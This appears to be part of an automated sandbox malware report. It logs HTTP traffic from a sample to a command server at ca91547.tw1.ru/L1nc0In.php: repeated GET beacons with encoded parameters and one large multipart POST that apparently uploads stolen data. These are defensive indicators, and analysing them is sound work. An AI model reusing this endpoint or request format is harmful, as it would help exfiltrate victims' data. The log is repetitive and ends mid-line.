Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&9cf44557760a31b9394c29aa9649d97b=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiI5EmMiNTMjJTN5EmZjFDZjZDN5kTMyYmYkRjY2cDOiZjZ2YmNwM2NxIiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&71411a4c54be7086c59f1fd61c0b5f77=QX9JSUNJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIxQjNiRGO3QGM1UjM3YzN4MjN0UzMkN2M4gTOlFWYjNGZ5ITNyIWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: POST /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryNxmnOXYO8CVog1eTUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ca91547.tw1.ruContent-Length: 81980Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHR